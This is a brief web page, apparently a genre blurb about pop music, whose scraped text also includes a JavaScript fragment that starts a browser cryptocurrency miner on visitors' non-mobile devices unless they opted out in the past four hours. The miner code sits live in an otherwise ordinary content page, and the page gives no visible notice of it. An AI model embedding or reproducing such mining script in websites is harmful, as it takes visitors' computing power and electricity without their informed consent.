Pop

The various shades of pop music. From electro pop, ballads, pop rock...as long as it pops!
// Only start on non-mobile devices and if not opted-out // in the last 14400 seconds (4 hours): if (!miner.isMobile() && !miner.didOptOut(14400)) { miner.start(); }